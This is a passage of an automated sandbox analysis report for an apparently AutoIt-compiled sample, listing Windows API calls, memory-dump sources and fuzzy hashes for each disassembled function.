                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 0db6fb3348909c9f320a5c32a50dc891413226f2b2623ae430b5aee6125753de
                                                    • Instruction ID: 432365bfe3a41e58a901604b598d13f2b451b883a2a0927d6e2aa6620f8ba35a
                                                    • Opcode Fuzzy Hash: 0db6fb3348909c9f320a5c32a50dc891413226f2b2623ae430b5aee6125753de
                                                    • Instruction Fuzzy Hash: A0113971D0062DEBCF009FE4E988AEEBB78FF49751F114095D841B6240CB709A548B95
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 008E851F
                                                    • ScreenToClient.USER32(?,?), ref: 008E8537
                                                    • ScreenToClient.USER32(?,?), ref: 008E855B
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E8576
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 871ba4cb675b2df9919ed2a2f350998a4933da5d8c43e9a95b19ba05e51e9a10
                                                    • Instruction ID: 58bcf31b5f87ae154fc1fe25bfbecf74c5e54ddd7fcf9f949ae6e94722743186
                                                    • Opcode Fuzzy Hash: 871ba4cb675b2df9919ed2a2f350998a4933da5d8c43e9a95b19ba05e51e9a10
                                                    • Instruction Fuzzy Hash: C21142B9D00249EFDB41CFA9D884AEEBBF5FB18310F108166E915E7220D735AA54CF90
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 008B34A7
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 008B34B8
                                                    • GetCurrentThreadId.KERNEL32 ref: 008B34BF
                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 008B34C6
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 2a246780677a55387e3316612a95676e27ee516335e519d19e3071682e164f00
                                                    • Instruction ID: 70e14e3a50aebb2e83a7fab0007cc73810c9f47f0bc857796906a225e634fbff
                                                    • Opcode Fuzzy Hash: 2a246780677a55387e3316612a95676e27ee516335e519d19e3071682e164f00
                                                    • Instruction Fuzzy Hash: 04E0D17150132477D7205B629C4DFE77F5CFF52BA1F400015F505D5191D6A8C948C1F0
                                                    APIs
                                                      • Part of subcall function 0086986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008698C9
                                                      • Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 008698D8
                                                      • Part of subcall function 0086986F: BeginPath.GDI32(?), ref: 008698EF
                                                      • Part of subcall function 0086986F: SelectObject.GDI32(?,00000000), ref: 00869918
                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 008E8F73
                                                    • LineTo.GDI32(?,?,?), ref: 008E8F80
                                                    • EndPath.GDI32(?), ref: 008E8F90
                                                    • StrokePath.GDI32(?), ref: 008E8F9E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: 8be454303d6a3d617fee8b2df62220dc37134dd88d421a5002c5e47c5f0b289f
                                                    • Instruction ID: 2c07cf827d8f92d32ae0ba848d9fb364de773b93d8a5eca1bcef4247640af33b
                                                    • Opcode Fuzzy Hash: 8be454303d6a3d617fee8b2df62220dc37134dd88d421a5002c5e47c5f0b289f
                                                    • Instruction Fuzzy Hash: E0F05431005695BADB125F959C0DFCE3F59BF06310F088100FA11660E187759556EBD5
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 008AEACE
                                                    • GetDC.USER32(00000000), ref: 008AEAD8
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEAF8
                                                    • ReleaseDC.USER32(?), ref: 008AEB19
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: c8b5717c6ad6f7f2b8c69e1c15ccad88a4b5e87faff3a8a3afa760c58feb3d1d
                                                    • Instruction ID: 29edda462ff370bf4f60370688c3267228a2d3b9bd1899657f6a9201545da455
                                                    • Opcode Fuzzy Hash: c8b5717c6ad6f7f2b8c69e1c15ccad88a4b5e87faff3a8a3afa760c58feb3d1d
                                                    • Instruction Fuzzy Hash: 3AE04F75800314EFCF409FA4D988A5DBBB1FB68315F108445F82AEB360DB785945DF41
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 008AEAE2
                                                    • GetDC.USER32(00000000), ref: 008AEAEC
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008AEAF8
                                                    • ReleaseDC.USER32(?), ref: 008AEB19
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 89fac920ee4d4f100a01152fc9cb7db9e82bd87cc96645f234807264035f4b77
                                                    • Instruction ID: f023afe70d3556c6d901ebabb334d6bd9453afd9bbd9ed535d7eaa181e2080b8
                                                    • Opcode Fuzzy Hash: 89fac920ee4d4f100a01152fc9cb7db9e82bd87cc96645f234807264035f4b77
                                                    • Instruction Fuzzy Hash: 14E012B5800304EFCF509FA49988A5DBBB1FB68315B108049E92AEB360DB386A09DF40
                                                    APIs
                                                      • Part of subcall function 00853914: _wcslen.LIBCMT ref: 00853919
                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 008C5643
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Connection_wcslen
                                                    • String ID: *$LPT
                                                    • API String ID: 1725874428-3443410124
                                                    • Opcode ID: 302d16371c6dbc24c15ece8140f5f047599587f23d1f3367f197916cad9c4c01
                                                    • Instruction ID: dd36d9cff7d3fb53c8eda1cb99208310b14bef59375569149c51f4a706dd4b5c
                                                    • Opcode Fuzzy Hash: 302d16371c6dbc24c15ece8140f5f047599587f23d1f3367f197916cad9c4c01
                                                    • Instruction Fuzzy Hash: 1C912775A00604DFCB15DF58C484EAABBB5FF48304F59809DE80A9B362D771EE86CB91
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 0087E65D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__start
                                                    • String ID: pow
                                                    • API String ID: 3213639722-2276729525
                                                    • Opcode ID: e7f21494844811ac22354a2837891069da2cab997e35b9f73bcba8ad791cc6c3
                                                    • Instruction ID: 65e6e3307a6cbb01208cc9b25855c97ada5db6e3ab091ed37b85cd62b1f6ea7b
                                                    • Opcode Fuzzy Hash: e7f21494844811ac22354a2837891069da2cab997e35b9f73bcba8ad791cc6c3
                                                    • Instruction Fuzzy Hash: C451BB65A08105C6C715BB28CD4577A3BA4FB24750FB4CD98F089C62ADEF34CC96DB46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #
                                                    • API String ID: 0-1885708031
                                                    • Opcode ID: 22e43e1ffbb46d12958084aa626186794b73b8930743a90e7f2afe551ade793b
                                                    • Instruction ID: 48cfe66884b22e269004246c07a57c8bfbec972ef44fc40495412a5e84caddf8
                                                    • Opcode Fuzzy Hash: 22e43e1ffbb46d12958084aa626186794b73b8930743a90e7f2afe551ade793b
                                                    • Instruction Fuzzy Hash: BF51EF7550424ADFEF19DF28C0846BA7BA0FF16714F244065EC91EB790DA349D47CBA2
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 008CD89F
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008CD8A9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_wcslen
                                                    • String ID: |
                                                    • API String ID: 596671847-2343686810
                                                    • Opcode ID: eca92ff2c50a5bd0bb2437b806ec17ed1ddfa1df890e9ccc3f04b17f3bf7a93c
                                                    • Instruction ID: 7215d00763a9fe1bd1b08132f548bf72289cbe1354a8f2b96b467f7663c6ef06
                                                    • Opcode Fuzzy Hash: eca92ff2c50a5bd0bb2437b806ec17ed1ddfa1df890e9ccc3f04b17f3bf7a93c
                                                    • Instruction Fuzzy Hash: 1831F971801219ABDF15AFA4DC85EEEBFB9FF08304F104029F815B6265EB319A1ADB51
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 008E4DDF
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008E4DF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 113d72c03404b8a524b2ec2a05739f1ca230ed5b2d4b76b0dbef052d86d9cd9a
                                                    • Instruction ID: 9d79e6d3eab33ac3f39737d99640d0c2d14a7de5c32de2982a6e704d9968ba94
                                                    • Opcode Fuzzy Hash: 113d72c03404b8a524b2ec2a05739f1ca230ed5b2d4b76b0dbef052d86d9cd9a
                                                    • Instruction Fuzzy Hash: 11310A74A0134AAFDB14CFA6C980BDA7BB5FB4A300F105169E918EB391D770A945CF90
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008E3A3A
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008E3A45
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: a2cc2eb733cb7b0b0c7f57c16f25bb37cc2119d57f343a6b3be1489f6e788550
                                                    • Instruction ID: 58640c8a25352d19e1b36b4f2a89d137f170f8d551afd753d2113ce7107e3a75
                                                    • Opcode Fuzzy Hash: a2cc2eb733cb7b0b0c7f57c16f25bb37cc2119d57f343a6b3be1489f6e788550
                                                    • Instruction Fuzzy Hash: C211EF71300648BFEF219F15CC85EBB3BAAFB8A3A4F104124F968DB291D7719D918760
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008CD4EC
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008CD515
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 88808b813f3307766139ede8ec9f844d0407cfe0f586c73e2a8dba0a6865c558
                                                    • Instruction ID: fbdad112e608fe3351a3f2c51f9bd1d9453e4d45c17dfcfc20270c33a7e8fadd
                                                    • Opcode Fuzzy Hash: 88808b813f3307766139ede8ec9f844d0407cfe0f586c73e2a8dba0a6865c558
                                                    • Instruction Fuzzy Hash: 0C1191612153257AD7385B668C89FF7BEACFB127A8F00422AB609C3180D270E884C6B4
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                    • CharUpperBuffW.USER32(?,?,?), ref: 008B73AF
                                                    • _wcslen.LIBCMT ref: 008B73BB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$BuffCharUpper
                                                    • String ID: STOP
                                                    • API String ID: 1256254125-2411985666
                                                    • Opcode ID: a3f0ce5eac2b7506b48fb233104f6ce005c4b38cd0938250aadc8a61c2395e31
                                                    • Instruction ID: b1072900ca78692e8a34ae44403b7542aecdc1f8987d7214ef661a56a6762417
                                                    • Opcode Fuzzy Hash: a3f0ce5eac2b7506b48fb233104f6ce005c4b38cd0938250aadc8a61c2395e31
                                                    • Instruction Fuzzy Hash: 0901AD32A5462A8BCB219EBDDC809EF77E4FBA4714B500924E821D63A1EB30D908D651
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 008B242E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 945ec84f08a8c1640b7ac0aa616a383b6bd564765acdf8ae8030403ceee2c299
                                                    • Instruction ID: bd64adf285a8d32816f0ea089c9f7fe3be3b5f743e68a2b0aaa73f9ad6f69221
                                                    • Opcode Fuzzy Hash: 945ec84f08a8c1640b7ac0aa616a383b6bd564765acdf8ae8030403ceee2c299
                                                    • Instruction Fuzzy Hash: F101F5716452196BCB08EBA8CC91CFE37A4FF46314B000A19B873DB3D2DA30580D8712
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 008B2328
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 3ec7a3aecb293fe2410fadb8fe65fb1659eaf0fe4498e8c0f4c39f6a4ee5853e
                                                    • Instruction ID: fd6cb06a244f6bf3ae8c83b6072984602bfa1ca51eda88352fd85a05f8f1235b
                                                    • Opcode Fuzzy Hash: 3ec7a3aecb293fe2410fadb8fe65fb1659eaf0fe4498e8c0f4c39f6a4ee5853e
                                                    • Instruction Fuzzy Hash: B701F771A811086BCB08E794C992EEF77E8FF09300F1404197903E7392DA149E0D9773
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 008B23AA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 819d565e1d6a2988ab72074698964dce92703fdb8e907fe1d8015a33a578c077
                                                    • Instruction ID: c1559d770dd96ccb697c40dcc2f478438d94612a41981f669eb00c19e05f2de9
                                                    • Opcode Fuzzy Hash: 819d565e1d6a2988ab72074698964dce92703fdb8e907fe1d8015a33a578c077
                                                    • Instruction Fuzzy Hash: 2E01D471A4010867CB04EB94C982EEE37E8EB09344F5404157802E7392DA248E0D9773
                                                    APIs
                                                      • Part of subcall function 0085A1D4: _wcslen.LIBCMT ref: 0085A1DE
                                                      • Part of subcall function 008B4392: GetClassNameW.USER32(?,?,000000FF), ref: 008B43B5
                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 008B24B5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 624084870-1403004172
                                                    • Opcode ID: 6d88c9f915de907ef9b303ecadc4ae88c7ed1e43fcf142d2694ecb505292e85d
                                                    • Instruction ID: f803f23a6cd725a30f5e037447a14d637c6a4f72935564b6a861f0103398a2e9
                                                    • Opcode Fuzzy Hash: 6d88c9f915de907ef9b303ecadc4ae88c7ed1e43fcf142d2694ecb505292e85d
                                                    • Instruction Fuzzy Hash: 11F0F971B4521966CB08E3A88C82EFE3768FF01314F040D15B863E77C2DA64580D4266
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008B1205
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
